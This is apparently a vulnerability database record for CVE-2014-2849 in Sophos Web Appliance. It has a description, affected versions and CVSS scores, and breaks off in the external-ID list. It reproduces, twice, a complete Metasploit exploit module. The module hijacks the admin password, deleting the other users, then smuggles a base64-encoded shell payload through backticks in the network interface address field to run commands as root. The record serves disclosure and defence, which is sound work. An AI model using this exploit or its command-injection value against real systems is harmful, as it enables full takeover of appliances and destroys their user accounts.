var-201404-0438
Vulnerability from variot

The Change Password dialog box (change_password) in Sophos Web Appliance before 3.8.2 allows remote authenticated users to change the admin user password via a crafted request. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sophos Web Appliance. Authentication is required to exploit this vulnerability. The specific flaws exist within the change_password and netinterface functions of the web appliance. The first flaw allows an unprivileged user to change the admin's password, and a remote code execution vulnerability exists when updating the network interface; this allows an attacker to execute code with root privileges. Successfully exploiting these issues will result in the complete compromise of affected computers. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc.

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution',
      'Description'    => %q{
        This module takes advantage of two vulnerabilities in order to gain remote code execution as root
        as an otherwise non-privileged authorized user.
        No server-side sanitization is done on values passed when configuring a static network interface.
        This allows an administrator user to run arbitrary commands in the context of the web application,
        which is root when configuring the network interface. This module will inadvertently delete
        any other users that may have been present as a side effect of changing the admin's password.
      },
      'Author'         =>
        [
          'Brandon Perry <bperry.volatile@gmail.com>' # discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-069/']
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'       => 500,
          'DisableNops' => true,
          'BadChars'    => "", #base64 encryption ftw!
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet'
            }
        },
      'Targets'        =>
        [
          [ 'Sophos Web Protection Appliance 3.8.1.1', { }]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 8 2014'
      ))

    register_options(
      [
        OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', nil]),
        OptString.new('TARGETURI', [true, 'The target URI', '/']),
        Opt::RPORT(443)
      ],
      self.class
    )
  end

  def exploit
    init = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php')
    })

    if !init or !init.body
      fail_with("Could not connect to host")
    end

    print_status("Getting STYLE key...")

    style = ''
    init.body.each_line do |line|
      next if line !~ /name="STYLE" value="(.*)"/
      style = $1
    end

    if style == ''
      fail_with("Could not find style key.")
    end

    post = {
      'STYLE' => style,
      'destination' => '',
      'section' => '',
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    }

    print_status("Authenticating as " + datastore['USERNAME'])
    login = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/index.php?c=login'),
      'method' => 'POST',
      'vars_post' => post
    })

    if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
      fail_with("Authentication failed")
    end

    #I don't know what salt is being used to hash these
    #passwords (probably in js somewhere), so I have
    #to use a static one that I saw being POSTed while
    #exploring, it is 'notpassword'.
    #
    #This will actually delete every other user that exists
    #except for admin, whose password will be changed
    #
    #whoops
    admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"'
    admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default '
    admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"'
    admin_hash << ': [], "user_id": 0}]'

    post = {
      'action' => 'save',
      'STYLE' => style,
      'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])),
      'current' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
      'new' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
      'admins' => admin_hash
    }

    print_status("Changing old password hash to notpassword")
    passchange = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'),
      'method' => 'POST',
      'vars_post' => post
    })

    if !passchange or passchange.code != 200
      fail_with("Couldn't update admin's password")
    end

    print_status("Logging in as the admin now")
    init = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php')
    })

    if !init or init.code != 200
      fail_with("Couldn't reget index page for admin auth")
    end

    init.body.each_line do |line|
      next if line !~ /name="STYLE" value="(.*)"/
      style = $1
    end

    post = {
      'STYLE' => style,
      'destination' => '',
      'section' => '',
      'username' => 'admin',
      'password' => 'notpassword'
    }

    login = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php?c=login'),
      'method' => 'POST',
      'vars_post' => post
    })

    if !login or login.code != 200 or login.body !~ /admin<\/a>/
      fail_with("Couldn't login as admin")
    end

    pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))
    post = {
      'STYLE' => style,
      'dhcp' => 'no',
      'address' => "192.16`echo #{pay}|base64 --decode|sh`8.1.16",
      'gateway' => '192.168.1.254',
      'sb_bridge' => 'explicit',
      'netmask' => '255.255.255.0',
      'sb_linktype' => 'auto',
      'dns' => 'yes',
      'dns1' => '192.168.1.254',
      'dns2' => '',
      'dns3' => ''
    }

    print_status("Sending payload")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'),
      'method' => 'POST',
      'vars_post' => post
    })
  end
end



{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "3.4.5"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "3.4.8"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "3.4.7"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "3.5.1.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "3.5.3"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "3.4.6"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "3.5.0"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "3.5.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "3.5.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "3.5.1.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": null,
        "trust": 1.5,
        "vendor": "sophos",
        "version": null
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.2.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.4.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.2.2.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.2.3"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.4.3"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.2.4.0"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.3.0"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.0"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.1.0.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.3.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.4.0"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.8.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.9.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.4.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.1.3"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.1.0"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.0.0"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.4.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.8.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.3.6.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.4.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.2.5"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.3.5.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.8.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.3"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.3"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.6"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.3.5"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.2.3"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.4.4"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.0.5"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.4.3.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.0.1.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.5"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.3.3.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.5.6"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.2.7"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.3.3"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.0.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.4"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.7"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.8"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.2.4.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.3.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.4"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.1.4"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.2.4"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.2.6"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": null
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.1.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.8.1.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.1.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.5.4"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.3.4"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.0.5.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.3.6"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.2.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.5.5"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.8.0"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.6.1.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.7.9"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.0.4"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.0.1"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.2.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sophos",
        "version": "3.0.3"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "sophos",
        "version": "3.8.2"
      },
      {
        "_id": null,
        "model": "web appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "3.0"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-14-069"
      },
      {
        "db": "BID",
        "id": "66734"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-157"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2849"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:sophos:web_appliance",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:sophos:web_appliance_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Brandon Perry",
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-14-069"
      },
      {
        "db": "BID",
        "id": "66734"
      },
      {
        "db": "PACKETSTORM",
        "id": "126099"
      }
    ],
    "trust": 1.1
  },
  "cve": "CVE-2014-2849",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.0,
            "id": "CVE-2014-2849",
            "impactScore": 9.2,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "ZDI",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.5,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.8,
            "id": "CVE-2014-2849",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.0,
            "id": "VHN-70788",
            "impactScore": 9.2,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:N/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2014-2849",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2014-2849",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "ZDI",
            "id": "CVE-2014-2849",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201404-157",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-70788",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-14-069"
      },
      {
        "db": "VULHUB",
        "id": "VHN-70788"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-157"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2849"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "The Change Password dialog box (change_password) in Sophos Web Appliance before 3.8.2 allows remote authenticated users to change the admin user password via a crafted request. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sophos Web Appliance. Authentication is required to exploit this vulnerability.The specific flaws exist within the change_password and netinterface functions of the web appliance.  The first flaw will allow for an unprivileged user to change the admin\u0027s password and a remote code execution vulnerability exists when updating the network interface.  This allows for an attacker to execute under root privileges. Successfully exploiting these issues will result in the complete compromise of affected computers. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. ##\n# This module requires Metasploit: http//metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \u0027msf/core\u0027\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n\n  def initialize(info = {})\n    super(update_info(info,\n      \u0027Name\u0027           =\u003e \u0027Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution\u0027,\n      \u0027Description\u0027    =\u003e %q{\n        This module takes advantage of two vulnerabilities in order to gain remote code execution as root\n        as an otherwise non-privileged authorized user. \n        No server-side sanitization is done on values passed when configuring a static network interface. \n        This allows an administrator user to run arbitrary commands in the context of the web application,\n        which is root when configuring the network interface. This module will inadvertently delete\n        any other users that may have been present as a side effect of changing the admin\u0027s password. \n      },\n      \u0027Author\u0027         =\u003e\n        [\n          \u0027Brandon Perry \u003cbperry.volatile@gmail.com\u003e\u0027 # discovery and Metasploit module\n        ],\n      \u0027License\u0027        =\u003e MSF_LICENSE,\n      \u0027References\u0027     =\u003e\n        [\n          [\u0027URL\u0027, \u0027http://www.zerodayinitiative.com/advisories/ZDI-14-069/\u0027]\n        ],\n      \u0027Platform\u0027       =\u003e [\u0027unix\u0027],\n      \u0027Arch\u0027           =\u003e ARCH_CMD,\n      \u0027Privileged\u0027     =\u003e true,\n      \u0027Payload\u0027        =\u003e\n        {\n          \u0027Space\u0027       =\u003e 500,\n          \u0027DisableNops\u0027 =\u003e true,\n          \u0027BadChars\u0027    =\u003e \"\", #base64 encryption ftw!\n          \u0027Compat\u0027      =\u003e\n            {\n              \u0027PayloadType\u0027 =\u003e \u0027cmd\u0027,\n              \u0027RequiredCmd\u0027 =\u003e  \u0027generic telnet\u0027\n            }\n        },\n      \u0027Targets\u0027        =\u003e\n        [\n          [ \u0027Sophos Web Protection Appliance 3.8.1.1\u0027, { }]\n        ],\n      \u0027DefaultOptions\u0027 =\u003e\n        {\n          \u0027SSL\u0027 =\u003e true\n        },\n      \u0027DefaultTarget\u0027  =\u003e 0,\n      \u0027DisclosureDate\u0027 =\u003e \u0027Apr 8 2014\u0027\n      ))\n\n    register_options(\n      [\n        OptString.new(\u0027USERNAME\u0027, [true, \u0027The username to authenticate as\u0027, nil]),\n        OptString.new(\u0027PASSWORD\u0027, [true, \u0027The password to authenticate with\u0027, nil]),\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027The target URI\u0027, \u0027/\u0027]),\n        Opt::RPORT(443)\n      ],\n      self.class\n    )\n  end\n\n  def exploit\n      init = send_request_cgi({\n        \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php\u0027)\n      })\n\n      if !init or !init.body\n        fail_with(\"Could not connect to host\")\n      end\n\n      print_status(\"Getting STYLE key...\")\n\n      style = \u0027\u0027\n      init.body.each_line do |line|\n        next if line !~ /name=\"STYLE\" value=\"(.*)\"/\n        style = $1\n      end\n\n      if style == \u0027\u0027\n        fail_with(\"Could not find style key.\")\n      end\n\n      post = {\n       \u0027STYLE\u0027 =\u003e style,\n       \u0027destination\u0027 =\u003e \u0027\u0027,\n       \u0027section\u0027 =\u003e \u0027\u0027,\n       \u0027username\u0027 =\u003e datastore[\u0027USERNAME\u0027],\n       \u0027password\u0027 =\u003e datastore[\u0027PASSWORD\u0027]\n      }\n\n      print_status(\"Authenticating as \" + datastore[\u0027USERNAME\u0027])\n      login = send_request_cgi({\n        \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/index.php?c=login\u0027),\n        \u0027method\u0027 =\u003e \u0027POST\u0027,\n        \u0027vars_post\u0027 =\u003e post\n      })\n\n      if !login or login.code != 200 or login.body !~ /#{datastore[\u0027USERNAME\u0027]}\u003c\\/a\u003e/\n        fail_with(\"Authentication failed\")\n      end\n\n      #I don\u0027t know what salt is being used to hash these\n      #passwords (probably in js somewhere), so I have\n      #to use a static one that I saw being POSTed while\n      #exploring, it is \u0027notpassword\u0027. \n      #\n      #This will actually delete every other user that exists\n      #except for admin, whose password will be changed\n      #\n      #whoops\n      admin_hash = \u0027[{\"id\": \"default_admin\", \"username\": \"admin\", \"name\": \"Default Administrator\"\u0027\n      admin_hash \u003c\u003c \u0027, \"password\": \"70ec23d3e019a307081732c0162b2733\", \"description\": \"Default \u0027\n      admin_hash \u003c\u003c \u0027Administrator Account\", \"admin\": true, \"roles\": [\"admin\"], \"reporting_groups\"\u0027\n      admin_hash \u003c\u003c \u0027: [], \"user_id\": 0}]\u0027\n\n      post = {\n        \u0027action\u0027 =\u003e \u0027save\u0027,\n        \u0027STYLE\u0027 =\u003e style,\n        \u0027username\u0027 =\u003e Rex::Text.uri_encode(Rex::Text.encode_base64(datastore[\u0027USERNAME\u0027])),\n        \u0027current\u0027 =\u003e Rex::Text.uri_encode(Rex::Text.encode_base64(datastore[\u0027PASSWORD\u0027])),\n        \u0027new\u0027 =\u003e Rex::Text.uri_encode(Rex::Text.encode_base64(datastore[\u0027PASSWORD\u0027])),\n        \u0027admins\u0027 =\u003e admin_hash\n      }\n\n      print_status(\"Changing old password hash to notpassword\")\n      passchange = send_request_cgi({\n        \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/index.php?c=change_password\u0027),\n        \u0027method\u0027 =\u003e \u0027POST\u0027,\n        \u0027vars_post\u0027 =\u003e post\n      })\n\n      if !passchange or passchange.code != 200\n        fail_with(\"Couldn\u0027t update admin\u0027s password\")\n      end\n\n      print_status(\"Logging in as the admin now\")\n      init = send_request_cgi({\n        \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php\u0027)\n      })\n\n      if !init or init.code != 200\n        fail_with(\"Couldn\u0027t reget index page for admin auth\")\n      end\n\n      init.body.each_line do |line|\n        next if line !~ /name=\"STYLE\" value=\"(.*)\"/\n        style = $1\n      end\n\n      post = {\n        \u0027STYLE\u0027 =\u003e style,\n        \u0027destination\u0027 =\u003e \u0027\u0027,\n        \u0027section\u0027 =\u003e \u0027\u0027,\n        \u0027username\u0027 =\u003e \u0027admin\u0027,\n        \u0027password\u0027 =\u003e \u0027notpassword\u0027\n      }\n\n      login = send_request_cgi({\n        \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php?c=login\u0027),\n        \u0027method\u0027 =\u003e  \u0027POST\u0027,\n        \u0027vars_post\u0027 =\u003e post\n      })\n\n      if !login or login.code != 200 or login.body !~ /admin\u003c\\/a\u003e/\n        fail_with(\"Couldn\u0027t login as admin\")\n      end\n\n      pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))\n      post = {\n        \u0027STYLE\u0027 =\u003e style,\n        \u0027dhcp\u0027 =\u003e \u0027no\u0027,\n        \u0027address\u0027 =\u003e \"192.16`echo #{pay}|base64 --decode|sh`8.1.16\",\n        \u0027gateway\u0027 =\u003e \u0027192.168.1.254\u0027,\n        \u0027sb_bridge\u0027 =\u003e \u0027explicit\u0027,\n        \u0027netmask\u0027 =\u003e \u0027255.255.255.0\u0027,\n        \u0027sb_linktype\u0027 =\u003e \u0027auto\u0027,\n        \u0027dns\u0027 =\u003e \u0027yes\u0027,\n        \u0027dns1\u0027 =\u003e \u0027192.168.1.254\u0027,\n        \u0027dns2\u0027 =\u003e \u0027\u0027,\n        \u0027dns3\u0027 =\u003e \u0027\u0027\n      }\n\n      print_status(\"Sending payload\")\n      send_request_cgi({\n        \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php?c=netinterface\u0027),\n        \u0027method\u0027 =\u003e \u0027POST\u0027,\n        \u0027vars_post\u0027 =\u003e post,\n      })\n  end\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-2849"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000"
      },
      {
        "db": "ZDI",
        "id": "ZDI-14-069"
      },
      {
        "db": "BID",
        "id": "66734"
      },
      {
        "db": "VULHUB",
        "id": "VHN-70788"
      },
      {
        "db": "PACKETSTORM",
        "id": "126099"
      }
    ],
    "trust": 2.7
  },
  "exploit_availability": {
    "_id": null,
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-70788",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-70788"
      }
    ]
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-2849",
        "trust": 3.5
      },
      {
        "db": "ZDI",
        "id": "ZDI-14-069",
        "trust": 2.5
      },
